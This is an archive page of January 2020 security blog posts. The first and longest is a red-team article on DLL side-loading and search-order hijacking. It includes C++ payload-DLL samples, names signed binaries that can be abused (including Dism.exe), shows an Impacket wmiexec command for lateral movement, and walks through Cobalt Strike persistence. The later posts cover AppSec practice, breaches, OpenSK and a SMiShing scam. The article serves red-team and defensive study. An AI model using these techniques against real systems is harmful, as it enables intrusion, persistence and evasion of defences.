Monthly Archives: January 2020

Abusing DLL Misconfigurations — Using Threat Intelligence to Weaponize R&D

DLL Abuse Techniques Overview

Dynamic-link library (DLL) side-loading occurs when Windows Side-by-Side (WinSxS) manifests are not explicit about the characteristics of DLLs being loaded by a program. In layman’s terms, DLL side-loading can allow an attacker to trick a program into loading a malicious DLL. If you are interested in learning more about how DLL side-loading works and how we see attackers using this technique, read through our whitepaper.

DLL hijacking occurs when an attacker is able to take advantage of the Windows search and load order, allowing the execution of a malicious DLL, rather than the legitimate DLL.

DLL side-loading and hijacking have been around for years; in fact, FireEye Mandiant was one of the first to discover the DLL side-loading technique, along with DLL search order hijacking, back in 2010. So why are we still writing a blog post about it? Because it is still a method that works and is used in real-world intrusions! FireEye Mandiant still identifies and observes threat groups using DLL abuse techniques during incident response (IR) engagements. There are still plenty of signed executables vulnerable to these techniques, and our red team has weaponized DLL abuse as part of its methodology. For detection and preventative measures, see the “Detection and Preventative Measures” section later in this post.

Even though DLL abuse techniques are not new or cutting edge, this blog post will showcase how the FireEye Mandiant red team uses FireEye Intelligence to expedite the research phase of identifying vulnerable executables, at scale! We will also walk you through how to discover new executables susceptible to DLL abuse and how the FireEye Mandiant red team has weaponized these DLL abuse techniques in its DueDLLigence tool. The DueDLLigence tool was initially released as a framework for application whitelisting bypasses, but given the nature of unmanaged exports it can be used for DLL abuse techniques as well.

Collecting and Weaponizing FireEye Intelligence

A benefit of being part of the red team at FireEye Mandiant is having access to a tremendous amount of threat intelligence; our organization’s incident response and intelligence consultants have observed, documented, and analyzed the actions of attackers across almost every major breach over the past decade. For this project, the FireEye Mandiant red team asked the FireEye Technical Operations and Reverse Engineering Advanced Practices (TORE AP) team to leverage FireEye Intelligence and provide us with all DLL abuse techniques used by attackers that matched the following criteria:

  1. A standalone PE file (.exe file) was used to call a malicious DLL
  2. The .exe must be signed, and the certificate must not expire within a year
  3. The intelligence about the technique must include the name of the malicious DLL that was called

Once the results were provided to the red team, we started weaponizing the intelligence by taking the approach outlined in the rest of the post, which includes:

  1. Identifying executables susceptible to DLL search order hijacking
  2. Identifying library dependencies for the executable
  3. Satisfying APIs exported in the library

DLL Search Order Hijacking

In many cases it is possible to execute code within the context of a legitimate Portable Executable (PE) by taking advantage of insecure library references. If a developer allows LoadLibrary to resolve the path of a library dynamically, then that PE will also look in the current directory for the library DLL. This behavior can be used for malicious purposes by copying a legitimate PE to a directory where the attacker has write access. If the attacker creates a custom payload DLL, the application will load that DLL and execute the attacker’s code. This can be beneficial for a red team: the PE may be signed and appear trustworthy to the endpoint security solution (AV/EDR), it may bypass application whitelisting (AWL), and it can confuse or delay an investigation.
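
To make the insecure pattern concrete, the sketch below shows a hypothetical application (not PotPlayerMini’s actual code) loading a library without a fully qualified path, which leaves the resolution to the Windows DLL search order. The library name is taken from the example discussed below; the export name is a placeholder.

// insecure_loader.cpp - hypothetical example of an insecure library reference.
// Because no fully qualified path is given, Windows applies its DLL search
// order, which includes directories an attacker may control.
#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Vulnerable: "PotPlayer.dll" is resolved via the DLL search order.
    HMODULE mod = LoadLibraryW(L"PotPlayer.dll");
    if (mod == NULL) {
        printf("Library not found (error %lu)\n", GetLastError());
        return 1;
    }

    // Typical follow-up: resolve an export by name (name is illustrative).
    FARPROC fn = GetProcAddress(mod, "SomeExportedFunction");
    if (fn != NULL) {
        // ... call through fn ...
    }

    FreeLibrary(mod);
    return 0;
}

An attacker who can place a DLL with the expected name next to a copied instance of such an executable controls which code runs inside that signed process.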

In this section we will look at one example where we identify the conditions for hijacking a PE and implement the requirements in our payload DLL. For this test case we will use a signed binary PotPlayerMini (MD5: f16903b2ff82689404f7d0820f461e5d). This PE was chosen since it has been used by attackers dating back to 2016.

Identifying Library Dependencies

It is possible to determine which libraries and exports a PE requires through static analysis with tools such as IDA or Ghidra. The screenshot in Figure 1, for example, shows that PotPlayerMini tries to load a DLL called “PotPlayer.dll”.


Figure 1: Static Analysis of DLLs loaded by PotPlayerMini

Where static analysis is not feasible or desirable, it may be possible to use a hooking framework such as API Monitor or Frida to profile the LoadLibrary and GetProcAddress behavior of the application.

In Figure 2 we used API Monitor to see this same DLL loading behavior. As you can see, PotPlayerMini is looking for the PotPlayer.dll file in its current directory. At this point, we have validated that PotPlayerMini is susceptible to DLL search order hijacking.


Figure 2: Dynamic Analysis of DLLs loaded by PotPlayerMini

Satisfying Exports

After identifying potentially vulnerable library modules, we need to apply a similar methodology to identify which exports the PE requires from the module. Figure 3 shows a decompiled view of PotPlayerMini highlighting which exports it looks for in its GetProcAddress calls, identified through static analysis. Figure 4 shows the same analysis of exports in the PotPlayerMini application performed with dynamic analysis instead.


Figure 3: Static Analysis of exports in PotPlayerMini DLL


Figure 4: Dynamic Analysis of exports in PotPlayerMini DLL

In our case the payload is a .NET DLL that uses UnmanagedExports, so we have to satisfy all of the binary’s export requirements, as shown in Figure 5. This is because the .NET UnmanagedExports library does not support DllMain, since that is an entry point and not an export. All export requirements need to be satisfied to ensure the DLL exposes every function the program accesses via GetProcAddress or the import address table (IAT). These export methods will match those observed in the static and dynamic analysis. This may require some trial and error depending on the validation present in the binary.


Figure 5: Adding export requirements in .NET DLL
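
Figure 5 shows the .NET UnmanagedExports approach used by DueDLLigence. Purely as an illustration of the same requirement in native code (this is a sketch, not the payload from the figure, and the export names are placeholders rather than PotPlayerMini’s real exports), a C++ payload would expose one stub per required export:

// payload_exports.cpp - native sketch of satisfying a host binary's exports.
// Export names below are placeholders; the real names are the ones observed
// during the static and dynamic analysis (Figures 3 and 4).
#include <windows.h>

static void RunPayload()
{
    // A message box keeps the proof of concept benign.
    MessageBoxW(NULL, L"Export hijack executed", L"PoC", MB_OK);
}

// One stub per export the host resolves via GetProcAddress or its IAT.
extern "C" __declspec(dllexport) void PlaceholderExportOne()
{
    RunPayload();
}

extern "C" __declspec(dllexport) void PlaceholderExportTwo()
{
    // Exports that are resolved but never exercised can simply return.
}

If the host validates return values or calls the exports with specific arguments, the stubs need to match those expectations, which is where the trial and error mentioned above comes in.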

Once we execute the binary, we can see that it successfully executes our function as shown in Figure 6.


Figure 6: Executing binary susceptible to DLL abuse

DLL Hijacking Without Satisfying All Exports

When writing a payload DLL in C/C++, it is possible to hijack control flow in DllMain. When doing this, it is not necessary to enumerate and satisfy all of the needed exports as previously described. There may also be cases where the DLL does not have any exports and can only be hijacked via the DllMain entry point.
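
A minimal sketch of that approach is shown below. It assumes a benign message-box payload and is illustrative only; a real payload would replace PayloadThread. Work is handed off to a new thread because DllMain runs under the loader lock.

// dllmain_hijack.cpp - minimal sketch of hijacking control flow in DllMain.
#include <windows.h>

static DWORD WINAPI PayloadThread(LPVOID)
{
    // Benign placeholder payload.
    MessageBoxW(NULL, L"DllMain hijack executed", L"PoC", MB_OK);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID)
{
    if (reason == DLL_PROCESS_ATTACH) {
        // Keep DllMain itself minimal (loader lock); run the payload elsewhere.
        DisableThreadLibraryCalls(hModule);
        CreateThread(NULL, 0, PayloadThread, NULL, 0, NULL);
    }
    return TRUE;
}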

An example of this is the Windows Media Player Folder Sharing executable, wmpshare.exe. You can copy the executable to a directory outside of its original location (C:\Program Files (x86)\Windows Media Player) and perform dynamic analysis using API Monitor. In Figure 7, you can see that the wmpshare.exe program uses the LoadLibraryW method to load the wmp.dll file but does not specify an explicit path to the DLL. When this happens, LoadLibraryW will first search the directory from which the application was loaded. Full details on the search order can be found in the LoadLibraryW documentation and the CreateProcess documentation.


Figure 7: Viewing LoadLibrary calls in wmpshare.exe

Since wmpshare.exe does not specify an explicit path, you can test whether it is susceptible to DLL hijacking by creating a blank file named “wmp.dll” and copying it to the same directory as the wmpshare.exe file. When running the wmpshare executable in API Monitor again, you can see that it first checks its current directory for the wmp.dll file, as shown in Figure 8. Therefore, it is possible to use this binary for DLL hijacking.


Figure 8: Viewing LoadLibrary calls in wmpshare.exe with dummy dll present

Figure 9 shows the wmpshare executable being used in a weaponized manner to take advantage of the DllMain entry point with a DLL created in C++.


Figure 9: Using the DllMain entry point

Discovering New Executables Susceptible to DLL Abuse

In addition to weaponizing the FireEye intelligence of the executables used for DLL abuse by attackers, the FireEye Mandiant red team performed research to discover new executables susceptible to abuse by targeting Windows system utilities and third-party applications.

Windows System Utilities

The FireEye Mandiant red team used the methodology described previously in the Collecting and Weaponizing FireEye Intelligence section to look for Windows system utilities in the C:\Windows\System32 directory that were susceptible to DLL abuse techniques. One of the system utilities found was the Deployment Image Servicing and Management (DISM) utility (Dism.exe). When performing dynamic analysis of this utility, we observed it attempting to load the DismCore.dll file from its current directory, as shown in Figure 10.


Figure 10: Performing dynamic analysis of Dism utility

Next, we loaded the DISM system utility into API Monitor from its normal path (C:\Windows\System32) in order to see the required exports as shown in Figure 11.


Figure 11: Required exports for DismCore.dll

The code shown in Figure 12 was added to DueDLLigence to validate that the DLL was vulnerable and could be run successfully using the DISM system utility.


Figure 12: Dism export method added to DueDLLigence
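
As a rough native equivalent of the Figure 12 addition (DueDLLigence itself is a .NET tool, so this is only a sketch), a stand-in DismCore.dll could export a stub with the name Dism.exe resolves. The DllGetClassObject name below is an assumption based on public reporting about DismCore.dll hijacking; verify it against Figure 11 or your own API Monitor trace.

// dismcore_stub.cpp - hypothetical DismCore.dll stub (x64 build assumed).
// Assumption: Dism.exe resolves DllGetClassObject by name from DismCore.dll.
#include <windows.h>

static void RunPayload()
{
    MessageBoxW(NULL, L"DismCore.dll hijack executed", L"PoC", MB_OK);
}

extern "C" __declspec(dllexport) HRESULT DllGetClassObject(REFCLSID, REFIID, LPVOID*)
{
    RunPayload();
    return CLASS_E_CLASSNOTAVAILABLE;  // fail benignly after running the payload
}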

Third-Party Applications

The FireEye Mandiant red team also targeted executable files associated with common third-party applications that could be susceptible to DLL abuse. One of the executable files discovered was a TortoiseSVN utility (SubWCRev.exe). When performing dynamic analysis of this utility, we observed it attempting to load crshhndl.dll from its current directory. The export methods are shown in Figure 13.


Figure 13: Performing dynamic analysis of SubWCRev.exe

The code shown in Figure 14 was added to DueDLLigence to validate that the DLL was vulnerable and could be run successfully using the TortoiseSVN utility.


Figure 14: SubWCRev.exe export methods added to DueDLLigence

Applying It to the Red Team

Having a standalone trusted executable allows the red team to simply copy the trusted executable and the malicious DLL to a victim machine and bypass various host-based security controls, including application whitelisting. Once the trusted executable (vulnerable to DLL abuse) and the malicious DLL are in the same working directory, the executable will load the corresponding DLL from that directory. This method can be used as a payload implant in multiple phases of the attack lifecycle, such as establishing persistence and performing lateral movement.

Persistence

In this example, we will be using the Windows system utility Dism.exe discovered in the Windows System Utilities section as our executable, along with a DLL generated by DueDLLigence in conjunction with SharPersist to establish persistence on a target system. First, the DISM system utility and malicious DLL are uploaded to the target system as shown in Figure 15.


Figure 15: Uploading payload files

Then we use SharPersist to add startup folder persistence that uses our DISM system utility and its associated DLL, as shown in Figure 16.


Figure 16: Adding startup folder persistence with SharPersist

After the target machine has been rebooted and the targeted user has logged on, Figure 17 shows our Cobalt Strike C2 server receiving a beacon callback from our startup folder persistence where we are living in the Dism.exe process.


Figure 17: Successful persistence callback

Lateral Movement

We will continue using the same DISM system utility and DLL file for lateral movement. The HOGWARTS\adumbledore user has administrative access to the remote host 192.168.1.101 in this example. We transfer the DISM system utility and the associated DLL file via the SMB protocol to the remote host as shown in Figure 18.


Figure 18: Transferring payload files to remote host via SMB

Then we set up a SOCKS proxy in our initial beacon and use Impacket’s wmiexec.py to execute our payload via Windows Management Instrumentation (WMI), as shown in Figure 19 and Figure 20.

proxychains python wmiexec.py -nooutput DOMAIN/user:password@x.x.x.x C:\\Temp\\Dism.exe

Figure 19: Executing payload via WMI with Impacket’s wmiexec.py


Figure 20: Output of executing command shown in Figure 19

We receive a beacon from the remote host, shown in Figure 21, after executing the DISM system utility via WMI.


Figure 21: Obtaining beacon on remote host

Detection and Preventative Measures

Detailed prevention and detection methods for DLL side-loading are well documented in the whitepaper mentioned in the DLL Abuse Techniques Overview. The whitepaper covers preventative measures at the software development level and provides recommendations at the endpoint user level. A few detection methods that are not mentioned in the whitepaper include:

  • Checking for processes that have unusual network connectivity
    • If you have created a baseline of normal process network activity, and the network activity for a given process deviates from that baseline, it is possible that the process has been compromised.
  • DLL whitelisting
    • Track the hashes of DLLs used on systems to identify discrepancies (a minimal sketch of this idea follows this list).
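
The sketch below illustrates that idea, assuming a locally maintained baseline mapping DLL paths to known-good hashes. It uses a simple FNV-1a hash purely for illustration; a real deployment would use a cryptographic digest such as SHA-256 and a centrally managed baseline.

// dll_hash_check.cpp - sketch of flagging DLLs whose hash deviates from a baseline.
#include <cstdint>
#include <fstream>
#include <iostream>
#include <map>
#include <string>

// FNV-1a 64-bit over the file contents (placeholder for a real digest).
static uint64_t HashFile(const std::string& path)
{
    std::ifstream in(path, std::ios::binary);
    uint64_t h = 1469598103934665603ULL;
    char c;
    while (in.get(c)) {
        h ^= static_cast<unsigned char>(c);
        h *= 1099511628211ULL;
    }
    return h;
}

int main()
{
    // Hypothetical baseline: DLL path -> known-good hash value.
    std::map<std::string, uint64_t> baseline = {
        {"C:\\Program Files\\App\\PotPlayer.dll", 0x0123456789abcdefULL},
    };

    for (const auto& entry : baseline) {
        if (HashFile(entry.first) != entry.second) {
            std::cout << "Discrepancy: " << entry.first << std::endl;
        }
    }
    return 0;
}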

These detection methods are difficult to implement at scale, but they can be used. That is exactly why this old technique is still valid and still used by modern red teams and threat groups. The real problem that allows this class of vulnerability to persist lies with software publishers: they need to be aware of DLL abuse techniques and know how to prevent such vulnerabilities from being built into their products (e.g., by implementing the mitigations discussed in our whitepaper). Applying these recommendations will reduce the DLL abuse opportunities attackers use to bypass several modern-day detection techniques.

Microsoft has provided some great resources on DLL security and triaging a DLL hijacking vulnerability.

Conclusion

Threat intelligence provides immense value to red teamers who are looking to perform offensive research and development and emulate real-life attackers. By looking at what real attackers are doing, a red teamer can glean inspiration for future tooling or TTPs.

DLL abuse techniques can be helpful from an evasion standpoint in multiple phases of the attack lifecycle, such as persistence and lateral movement. There will continue to be more executables discovered that are susceptible to DLL abuse and used by security professionals and adversaries alike.

Best Practices and Practical Steps to Guide Your AppSec Journey

Imagine that you are tasked with planning a vacation for you and your family. For your ideal trip, you would jet off to a five-star resort on a private island for a month of pampering and fine dining. But, since you have two children, a limited budget, and only one week of paid time off, you settle for a three-star, theme park resort with a spa and outdoor pool. Your family has a great time on the vacation and, using your new-found trip planning skills, you start preparing and saving for your dream getaway.

Spearheading an application security (AppSec) program can sometimes feel a little like that type of vacation planning: you can see an ideal state, but it can feel unattainable. Just like planning a vacation, creating an AppSec program is also dependent on time and money, as well as an organization's staff expertise, culture, and executive support.

Below, we look at both the best practices, and some practical first steps you can take that will prepare your AppSec program for improvements in the future. In other words, keep your eye on the private island AppSec, while moving forward with the theme park AppSec.

Best Practice #1: Use More Than One Application Security Testing Type

When you visit the doctor with an ailment, you undergo several tests to determine the diagnosis. There is no magic test that detects all illnesses. The same goes for AppSec tests: there is no one test that detects every vulnerability. So, to make sure that your application is fully secure, the best practice is to use as many testing types as possible.

Practical Advice: Start with What Makes the Most Sense, Then Add More Later

Develop an AppSec strategy to determine where you need AppSec solutions the most. Start by implementing the tests that will have the most impact, in the shortest amount of time, for the least amount of money. From there, you can start adding on more tests.

There are several factors that will help determine which tests will have the most impact. For example, if you have multiple applications, rank the applications based on the criticality of their risks, and test the applications with the most critical risks first. Another thing to consider is programming languages. If you leverage less-mainstream programming languages, there are limitations regarding the AppSec tests you can use. So start with tests that are not specific to language, like dynamic or penetration testing.

Best Practice #2: Shift Security Left

In today's fast-paced world, enterprises are moving from yearly product releases to monthly, weekly, or daily releases. To keep up with this change, security testing needs to be woven into the development cycle rather than tacked on after it. That way, when it is time to release the product, security testing will not stand in the way.

Practical Advice: Shift Security Culture Left

Moving security testing into the development cycle means that developers will play a bigger security role. Since most development and security teams have never worked together, "shifting security left" can be a significant cultural change.

Before making this change, a good first step is to help security understand how development works and to build a relationship. Understanding how development works involves learning the development team's tools and processes, as well as how they build software, so that security testing can be integrated organically. When security is organically woven into the development process, developers are more likely to be receptive to security, making it easier to forge trusting relationships.

You should also look for ways to automate security testing into the CI/CD pipeline. By integrating automated security tools into the CI/CD pipeline, you can incorporate testing without handing off code to another team, making it easier for developers to fix issues immediately.

Best Practice #3: Fix Everything Fast

Finding vulnerabilities is only half of the battle. You need a solid plan in place to fix them once they are discovered. Automating security testing in CI/CD pipelines allows organizations not only to find flaws faster, but also to speed up the remediation process.

Practical Advice: Prioritize Fixes While Creating Fewer Vulnerabilities

As much as we would love to fix all flaws instantaneously, it is not possible. A practical first step in remediation is prioritizing. When prioritizing your flaws, do not just concentrate on defect severity; also consider the criticality of the application and how easy it would be to exploit the flaw.

Best Practice #4: Embed Security Champions into Development Teams

Most developers do not have a security background. This makes it very challenging when you try to implement security tests in the development lifecycle. A way to help fill this knowledge gap is to select interested volunteers from the development teams to become security champions. Security champions learn about security testing and can reiterate important security messages back to their teams.

Practical Advice: Build Up Your Security Champions Capabilities

Building a team of security champions takes time. Start by making sure your organization's security, development, and leadership teams are all on board with the security champions concept. Once everyone agrees with the idea, help the security and development teams build a relationship. If developers and security personnel are on good terms, you have a much better chance of developers agreeing to become security champions.

Next, identify your champions. Security champions should be selected based on a demonstrated or perceived interest in learning more about security. If you select developers who do not have an interest in security, there is a high probability that they will not be successful in the role. Lastly, nurture your identified champions by giving them the appropriate tools and support needed for success, like additional training in security concepts and code reviews.

Best Practice #5: Measure Your AppSec Results

It's critical to be able to measure and report on the success of an AppSec program using metrics. Identify which metrics are most important to your organization's key decision-makers, then display those metrics in an easy-to-understand, actionable manner.

Practical Advice: Focus on Your Policy Metric

Bringing too many metrics to your executives early on can be overwhelming and, quite frankly, unnecessary. Start by presenting one metric: how your AppSec program is complying with your internal AppSec policy. From here, you can start sharing other valuable metrics.

Remember, just like saving for your dream getaway, creating the perfect AppSec program takes time. But taking practical steps and looking toward the big picture will help you get closer to perfect sooner.

Learn more about the steps you can take to achieve AppSec maturity in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

Jeff Bezos met FBI investigators in 2019 over alleged Saudi hack

Amazon founder interviewed as FBI conducts inquiry into Israeli firm linked to malware

Jeff Bezos met federal investigators in April 2019 after they received information about the alleged hack of the billionaire’s mobile phone by Saudi Arabia, the Guardian has been told.

Bezos was interviewed by investigators at a time when the FBI was conducting an investigation into the Israeli technology company NSO Group, according to a person who was present at the meeting.


Say hello to OpenSK: a fully open-source security key implementation



Today, FIDO security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of OpenSK, an open-source implementation for security keys written in Rust that supports both FIDO U2F and FIDO2 standards.

Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case

By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.

With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a Nordic chip dongle. In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by FIDO2: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a custom, 3D-printable case that works on a variety of printers.

“We’re excited to collaborate with Google and the open source community on the new OpenSK research platform,” said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. “We hope that our industry leading nRF52840’s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.”

While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered as an experimental research project to be used for testing and research purposes.


Under the hood, OpenSK is written in Rust and runs on TockOS to provide better isolation and cleaner OS abstractions in support of security. Rust’s strong memory safety and zero-cost abstractions makes the code less vulnerable to logical attacks. TockOS, with its sandboxed architecture, offers the isolation between the security key applet, the drivers, and kernel that is needed to build defense-in-depth. Our TockOS contributions, including our flash-friendly storage system and patches, have all been upstreamed to the TockOS repository. We’ve done this to encourage everyone to build upon the work.


How to get involved and contribute to OpenSK 

To learn more about OpenSK and how to experiment with making your own security key, you can check out our GitHub repository today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.

Acknowledgements

We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek

Security Lessons From 2019’s Biggest Data Breaches

2019 already feels like it’s worlds away, but the data breaches many consumers faced last year are likely to have lasting effects. As we look back on 2019, it’s important to reflect on how our online security has been affected by various threats. With that said, let’s take a look at the biggest breaches of the year and how they’ve affected users everywhere.

Capital One breach

In late July, approximately 100 million Capital One users in the U.S. and 6 million in Canada were affected by a breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, 80,000 bank account numbers, and more. As one of the 10 largest banks based on U.S. deposits, the financial organization was certainly poised as an ideal target for a hacker to carry out a large-scale attack. The alleged hacker claimed that the data was obtained through a firewall misconfiguration, allowing for command execution with a server that granted access to data in Capital One’s storage space.

Facebook breach

In early September, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts. The exposed server was left without password protection, so anyone with internet access could find the database. The breached records contained a user’s unique Facebook ID and the phone number associated with the account. In some instances, the records also revealed the user’s name, gender, and location by country.

Collection #1 breach

Last January, we met Collection #1, a monster data set that exposed 772,904,991 unique email addresses and over 21 million unique passwords. Security researcher Troy Hunt first discovered this data set on the popular cloud service MEGA, specifically uncovering a folder holding over 12,000 files. Given the sheer volume of data, the set was likely compiled from multiple breaches. When the storage site was taken down, the folder was transferred to a public hacking site, available for anyone to take for free.

Verifications.io breach

Less than two months after Collection #1, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm Verifications.io. This company provides a service for email marketing firms to outsource the extensive work involved with validating mass amounts of emails. This service also helps email marketing firms avoid the risk of having their infrastructure blacklisted by spam filters. Therefore, Verifications.io was entrusted with a lot of data, creating an information-heavy database complete with names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, and more.

Orvibo breach

In mid-June, Orvibo, a smart home platform designed to help users manage their smart appliances, left an Elasticsearch server (a highly scalable search and analytics engine that allows users to store, search, and analyze big volumes of data in real time) online without password protection. The exposure left at least two billion log entries, each containing customer data, open to the public. This data included customer email addresses, the IP addresses of the smart home devices, Orvibo usernames, and hashed passwords, or unreadable strings of characters that are designed to be impossible to convert back into the original password.

What Users Can Learn From Data Breaches

Data breaches serve as a reminder that users and companies alike should do everything in their power to keep personal information protected. As technology continues to become more advanced, online threats will also evolve to become more sophisticated. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of massive data leaks. If you think you might have been affected by a data breach or want to take the necessary precautions to safeguard your information, follow these tips to help you stay secure:

  • Research before you buy. Although you might be eager to get the latest new device, some are made more secure than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks these features, consider upgrading.
  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords consistently to further protect your data.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.
  • Use a comprehensive security solution. Use a solution like McAfee Total Protection to help safeguard your devices and data from known vulnerabilities and emerging threats.

Stay Up to Date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Security Lessons From 2019’s Biggest Data Breaches appeared first on McAfee Blogs.

NICE Webinar: Learning Principles for Cybersecurity Practice

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Craig Jackson Program Director, Indiana University’s Center for Applied Cybersecurity Research Scott Russell Senior Policy Analyst, Indiana University’s Center for Applied Cybersecurity Research Susan Sons Chief Security Analyst, Indiana University’s Center for Applied Cybersecurity Research Synopsis: The NICE Cybersecurity Workforce Framework includes a few knowledge statements that are common for all work roles, including “Knowledge of cybersecurity and privacy principles.” What are the “cybersecurity principles

What Software Composition Analysis and Your Dentist Have in Common

SAST, DAST, IAST, SCA … confused about the differences? We thought it might be helpful to clear things up by using the analogy of human health. When you visit the doctor with an ailment, or even for a routine checkup, you are likely to undergo a series of tests to find potential health conditions or diseases. Since the tests are targeting different parts of the mind or body, the results may vary. So, the more tests performed, the better the chances of discovering and treating an illness. The same logic applies to security health. The more application security tests performed, the better the odds are that you will find and remediate security flaws or vulnerabilities.

Now that we understand the importance of the application security tests, and we know that they are looking for different vulnerabilities and flaws, how can we distinguish between them? We will continue with the human health analogy, comparing AppSec tests to common, easy-to-understand health tests.

Static analysis

Make no bones about it, static analysis is very similar to an X-ray. Just like X-rays, which produce a static image to find torn and broken bones, static analysis evaluates an application from the inside out, reviewing stationary code for security vulnerabilities. By catching the vulnerabilities before running the application, developers can fix flaws in a timely, cost-efficient manner.

Dynamic analysis

Dynamic analysis is comparable to a reflex test. During a reflex test, the doctor taps a tendon to make sure that the patient's motor and sensory skills are intact. Dynamic analysis leverages a similar outside-in approach, poking and prodding at the running application to analyze vulnerabilities.

Software composition analysis

For software composition analysis (SCA), think of a dental exam. During a dental exam, your fillings are inspected along with your teeth. Although fillings are not an organic part of the body, faulty dental fillings that go undetected and untreated can lead to serious illness. This concept is a lot like software composition analysis. SCA inspects open source code for vulnerabilities. This is code that you didn't write yourself, but it still affects the security and the health of the application. Despite the fact that open source is a third-party component, if vulnerabilities go undetected, it is nothing to smile about.

Interactive analysis

Interactive analysis can best be compared to an electrocardiography (EKG) exam, in which a doctor places electrodes on your chest to measure your heart's activity. The doctor might have you exercise while conducting the EKG to evaluate your heart under stress. With interactive analysis, you place an agent in the runtime environment and put the application under load. From there, you can see what vulnerabilities the agent discovers.

Penetration test

A penetration test is the equivalent of a doctor's personal assessment. When you visit the doctor and describe your symptoms, the doctor uses their expertise to provide a diagnosis. It is not unusual for the doctor to pick up on an illness that is undetectable by an exam. Similarly, in a penetration test, an expert penetration tester simulates a security attack on the application to find vulnerabilities that are often undetectable by other, more automated methods.

So, the next time you visit the doctor and undergo several tests, remember that each test holds a purpose. And when it is time to evaluate your AppSec program, remember that the same logic holds true. The more security tests you are able to perform, the better the chances of catching vulnerabilities.

Learn More

Get more details on the strengths and weaknesses of the different AppSec testing types in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

What You Need to Know About the FedEx SMiShing Scam

You receive a text message saying that you have a package out for delivery. While you might feel exhilarated at first, you should think twice before clicking on that link in the text. According to CNN, users across the U.S. are receiving phony text messages claiming to be from FedEx as part of a stealthy SMS phishing (SMiShing) campaign.

How SMiShing Works

This SMiShing campaign uses text messages that show a supposed tracking code and a link to “set delivery preferences.” The link directs the recipient to a scammer-operated website disguised as a fake Amazon listing. The listing asks the user to take a customer satisfaction survey. After answering a couple of questions, the survey asks the user to enter personal information and a credit card number to claim a free gift, which still requires a small shipping and handling fee. But according to HowtoGeek.com, agreeing to pay the small shipping fee also signs the user up for a 14-day trial to the company that sells the scam products. After the trial period, the user will be billed $98.95 every month. What’s more, the text messages use the recipient’s real name, making this threat even stealthier.

How to Stay Protected

So, what can online shoppers do to defend themselves from this SMiShing scam? Check out the following tips to remain secure:

  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Go directly to the source. FedEx stated that it would never send text messages or emails to customers that ask for money or personal information. When in doubt about a tracking number, go to the main website of the shipping company and search the tracking number yourself.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use mobile security software. Make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the FedEx SMiShing Scam appeared first on McAfee Blogs.

Vulnerability Reward Program: 2019 Year in Review



Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.

2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!

Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. As we have done in years past, we are sharing our 2019 Year in Review across these programs.

What’s changed in the past year?

  • Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their program rules page.
